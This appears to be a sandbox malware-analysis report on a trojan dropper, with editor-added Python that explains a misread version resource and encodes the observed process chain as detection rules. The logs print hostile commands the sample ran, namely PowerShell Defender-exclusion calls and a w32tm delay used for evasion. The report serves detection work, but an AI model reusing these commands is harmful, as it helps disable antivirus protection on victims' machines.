Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00906FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Windows\ShellExperiences\de5836ef699499
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0090848E
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00914088
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_009100B7
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_009040FE
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_009251C9
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00917153
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_009162CA
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_009032F7
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_009143BF
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0090C426
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0092D440
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0090F461
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_009177EF
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0092D8EE
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0090286B
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0090E9B7
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_009319F4
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00916CDC
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00913E0B
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00924F9A
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0090EFE2
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9B9E0D70
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BBA6C35
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BBA69FB
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BBA6977
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BB9079A
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BBA4F8F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD9BAD30E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_00007FFD9BAD2E1C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 26_2_00007FFD9BAF30E9
Source: C:\Recovery\uAsLgsGzSk.exe | Code function: 35_2_00007FFD9BA10D70
Source: C:\Recovery\uAsLgsGzSk.exe | Code function: 35_2_00007FFD9BA59A40
Source: C:\Recovery\uAsLgsGzSk.exe | Code function: 35_2_00007FFD9BA2BA1D
Source: C:\Recovery\uAsLgsGzSk.exe | Code function: 37_2_00007FFD9B9F0D70
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\CvvLBlqK.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: String function: 0091EB78 appears 39 times
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: String function: 0091EC50 appears 56 times
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: String function: 0091F5F0 appears 31 times
Source: NVLRgsWM.log.5.dr, vJjMMWBx.log.5.dr, maPwcuvP.log.5.dr, HupKRiKa.log.5.dr, cIDyHnkk.log.5.dr, JwbtnRPV.log.5.dr, zIxCDFUn.log.5.dr, zHJVyCcw.log.5.dr, hnxxzxgb.log.5.dr, CvvLBlqK.log.42.dr, FyhuXVvF.log.42.dr, vPOensqX.log.42.dr, mlFoDzaq.log.42.dr, eIxzTFKJ.log.42.dr, LqKTzAAu.log.42.dr, qTMMgMAe.log.42.dr, QdcRcxPi.log.42.dr, GvICsVKA.log.42.dr (18 dropped files, identical result) | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
The "ARM COFF executable" description is the file-type scanner misreading the start of an ordinary VS_VERSIONINFO resource as a COFF file header: 52 is sizeof(VS_FIXEDFILEINFO), and 0x5f0053 and 4522070 are the UTF-16 bytes of "S_" and "VE" taken from the key string "VS_VERSION_INFO". It does not indicate an embedded ARM binary in the dropped files.
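The identical "ARM COFF executable ... created Sat Mar 7 05:34:56 1970" line on all eighteen dropped .log files is what a COFF magic rule reports when it reads the first bytes of a VS_VERSIONINFO resource (wLength, wValueLength, wType, then the UTF-16 key "VS_VERSION_INFO") as an IMAGE_FILE_HEADER. The Python below is an added example by the editor, not code from the Joe Sandbox report or from the sample; it rebuilds such a header and shows that every reported number falls out of the key string. Only the 448-byte wLength is an assumption, inferred from the "ARM" machine type (0x01C0); the real resource length is not on the page.

```python
import struct
from datetime import datetime, timezone

IMAGE_FILE_MACHINE_ARM = 0x01C0          # COFF Machine value that a magic rule prints as "ARM"
VS_FIXEDFILEINFO_SIZE = 52               # wValueLength whenever a VS_FIXEDFILEINFO block follows
VS_KEY = "VS_VERSION_INFO".encode("utf-16-le")


def vs_version_info_header(w_length: int = IMAGE_FILE_MACHINE_ARM) -> bytes:
    """Leading bytes of a VS_VERSIONINFO resource: wLength, wValueLength, wType, szKey.

    Assumption: wLength = 0x01C0 (448 bytes) is inferred from the report's "ARM"
    machine type; the page does not show the resources' actual length.
    """
    return struct.pack("<HHH", w_length, VS_FIXEDFILEINFO_SIZE, 0) + VS_KEY


def read_as_coff(blob: bytes) -> dict:
    """Interpret the first 20 bytes as an IMAGE_FILE_HEADER, as a COFF magic rule does."""
    machine, nsect, ts, symoff, nsyms, opthdr, chars = struct.unpack_from("<HHIIIHH", blob, 0)
    dt = datetime.fromtimestamp(ts, tz=timezone.utc)
    return {
        "machine": machine,                       # wLength          -> 0x01C0 "ARM"
        "sections": nsect,                        # wValueLength     -> 52
        "timestamp": f"{dt:%a %b} {dt.day} {dt:%H:%M:%S %Y}",   # wType + "V\0" -> 0x00560000
        "symbol_offset": symoff,                  # "S\0_\0"         -> 0x5f0053
        "symbols": nsyms,                         # "V\0E\0"         -> 4522070
        "optional_header_size": opthdr,           # "R\0"            -> 82
        "executable": bool(chars & 0x0002),       # "S\0" = 0x0053: IMAGE_FILE_EXECUTABLE_IMAGE set
        "relocs_stripped": bool(chars & 0x0001),  # IMAGE_FILE_RELOCS_STRIPPED -> "no relocation info"
        "line_numbers_stripped": bool(chars & 0x0004),  # clear, hence "not stripped"
    }


def is_versioninfo_misparse(blob: bytes) -> bool:
    """Triage check: the 'symbol table' and 'symbol count' fields are really the UTF-16 key."""
    return (len(blob) >= 36
            and blob[6:36] == VS_KEY
            and read_as_coff(blob)["sections"] == VS_FIXEDFILEINFO_SIZE)


if __name__ == "__main__":
    hdr = vs_version_info_header()
    for k, v in read_as_coff(hdr).items():
        print(f"{k:>22}: {v}")
    print("VS_VERSIONINFO misread as COFF:", is_versioninfo_misparse(hdr))
```

The constants 52, 0x5f0053 and 4522070 are the tell: together they are the bytes of "S_" and "VE" from "VS_VERSION_INFO", so a file-type line carrying all three is a version resource regardless of what machine type or timestamp it claims.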
Source: hz7DzW2Yop.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@37/346@0/2
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_00906C74 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\zHJVyCcw.log
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Mutant created: NULL
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\bd9da7f16f55026e79d340b5ea02a5a7f7e28b00743a65fca34947ef8d4bc1c2
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\AppData\Local\Temp\l7eRP4ZeWh
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Command line argument: sfxname (0_2_0091DF1E)
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Command line argument: sfxstime (0_2_0091DF1E)
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Command line argument: STARTDLG (0_2_0091DF1E)
(sfxname and sfxstime are the environment variables a WinRAR SFX stub exports to its payload, and STARTDLG is the stub's dialog resource; this is consistent with hz7DzW2Yop.exe being a self-extracting archive that starts C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe after extraction.)
Source: hz7DzW2Yop.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hz7DzW2Yop.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (15 identical entries)
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: hz7DzW2Yop.exe | ReversingLabs: Detection: 68%
Source: hz7DzW2Yop.exe | Virustotal: Detection: 59%
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | File read: C:\Users\user\Desktop\hz7DzW2Yop.exe
Source: unknown | Process created: C:\Users\user\Desktop\hz7DzW2Yop.exe "C:\Users\user\Desktop\hz7DzW2Yop.exe"
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\HyperWebbroker\serverBrokerperfMonitor.exe "C:\HyperWebbroker/serverBrokerperfMonitor.exe"
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Recovery\uAsLgsGzSk.exe C:\Recovery\uAsLgsGzSk.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown | Process created: C:\Recovery\uAsLgsGzSk.exe C:\Recovery\uAsLgsGzSk.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\HyperWebbroker\serverBrokerperfMonitor.exe "C:\HyperWebbroker/serverBrokerperfMonitor.exe"
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
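The process-creation records above are the chain a detection engineer would match on: a script host handing off to cmd.exe and a batch file, a payload started from C:\HyperWebbroker, four Add-MpPreference exclusions, a batch file in the user's Temp folder, w32tm /stripchart used as a sleep, and the final payload launched from C:\Windows\ShellExperiences and C:\Recovery. The Python below is an added example by the editor, not code from the report or from Joe Sandbox: it encodes those observations as rules, runs them over a constructed copy of the records, and reconstructs each hit's lineage. The rule names and the lists of standard and abused directories are the editor's choices, not anything the report defines.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: parent image, child image, child command line."""
    parent: str
    image: str
    cmdline: str


def _mp_exclusion(path: str) -> str:
    # Command-line shape of the four Add-MpPreference calls in the report.
    return f"\"powershell\" -Command Add-MpPreference -ExclusionPath '{path}'"


# Constructed sample input: the distinct process-creation records from this report.
# "unknown" is how the sandbox labels a parent it did not observe.
EVENTS = [
    ProcEvent("unknown", r"C:\Users\user\Desktop\hz7DzW2Yop.exe", r'"C:\Users\user\Desktop\hz7DzW2Yop.exe"'),
    ProcEvent(r"C:\Users\user\Desktop\hz7DzW2Yop.exe", r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe"'),
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\HyperWebbroker\serverBrokerperfMonitor.exe",
              r'"C:\HyperWebbroker/serverBrokerperfMonitor.exe"'),
    *[ProcEvent(r"C:\HyperWebbroker\serverBrokerperfMonitor.exe",
                r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", _mp_exclusion(p))
      for p in (r"C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe",
                r"C:\Recovery\uAsLgsGzSk.exe",
                r"C:\Windows\ShellExperiences\uAsLgsGzSk.exe",
                r"C:\Recovery\SystemSettings.exe")],
    ProcEvent(r"C:\HyperWebbroker\serverBrokerperfMonitor.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\chcp.com", "chcp 65001"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\w32tm.exe",
              "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\ShellExperiences\uAsLgsGzSk.exe",
              r'"C:\Windows\ShellExperiences\uAsLgsGzSk.exe"'),
    ProcEvent("unknown", r"C:\Recovery\uAsLgsGzSk.exe", r"C:\Recovery\uAsLgsGzSk.exe"),
]

# Roots that normally hold executables; anything outside them is worth a look.
STANDARD_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\", "c:\\users\\")
# Directories this sample drops into and launches from (editor's list, taken from the report).
ABUSED_DIRS = ("c:\\recovery\\", "c:\\windows\\shellexperiences\\",
               "c:\\program files (x86)\\windows defender\\")
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\s+-exclusion(path|process|extension)\b", re.I)
W32TM_DELAY = re.compile(r"\bw32tm\b.*/stripchart\b", re.I)


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def classify(ev: ProcEvent) -> list[str]:
    """Names of every rule the record matches; an empty list means nothing fired."""
    tags = []
    cmd, img = ev.cmdline.lower(), _norm(ev.image)
    parent, child = _name(ev.parent).lower(), _name(ev.image).lower()
    if DEFENDER_EXCLUSION.search(cmd):
        tags.append("defender_exclusion_added")
    if parent in ("wscript.exe", "cscript.exe") and child == "cmd.exe" and ".bat" in cmd:
        tags.append("script_host_spawns_batch")
    if "\\appdata\\local\\temp\\" in cmd and ".bat" in cmd:
        tags.append("batch_from_user_temp")
    if not img.startswith(STANDARD_ROOTS) or img.startswith(ABUSED_DIRS):
        tags.append("exec_from_unusual_location")
    if W32TM_DELAY.search(cmd):
        tags.append("w32tm_stripchart_delay")
    return tags


def summarize(events) -> dict[str, int]:
    """Records per rule: the overview an analyst wants before reading individual lines."""
    counts: dict[str, int] = {}
    for ev in events:
        for tag in classify(ev):
            counts[tag] = counts.get(tag, 0) + 1
    return counts


def lineage(events, target: ProcEvent, max_depth: int = 16) -> list[str]:
    """Follow parent image paths back to the root; returns basenames, oldest first."""
    by_image = {}
    for ev in events:
        by_image.setdefault(_norm(ev.image), ev)   # first record for an image path wins
    chain, cur = [_name(target.image)], target
    while len(chain) < max_depth:                   # depth cap guards against parent loops
        parent = by_image.get(_norm(cur.parent))
        if parent is None:
            break
        chain.append(_name(parent.image))
        cur = parent
    return chain[::-1]


if __name__ == "__main__":
    for ev in EVENTS:
        hits = classify(ev)
        if hits:
            print(f"{' > '.join(lineage(EVENTS, ev))}\n    {', '.join(hits)}: {ev.cmdline}")
    print(summarize(EVENTS))
```

Two rules deserve a note. The location rule fires on C:\HyperWebbroker because it is outside every standard root, and on C:\Recovery and C:\Windows\ShellExperiences because those are inside C:\Windows or the system drive root yet are never legitimate launch directories; matching only on "outside Program Files" would miss the final payload. The w32tm rule is deliberately narrow (stripchart against localhost is the sandbox-visible sleep idiom); a timing check on the process gap between chcp and the next child would catch variants that swap in ping or timeout.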
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Section loaded (in load order): api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, iconcodecservice.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wintypes.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded (in load order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, gpapi.dll, windows.storage.dll, propsys.dll, apphelp.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded (in load order): cmdext.dll, apphelp.dll
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Section loaded (in load order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, amsi.dll, userenv.dll, ntmarta.dll, wbemcomn.dll, uxtheme.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
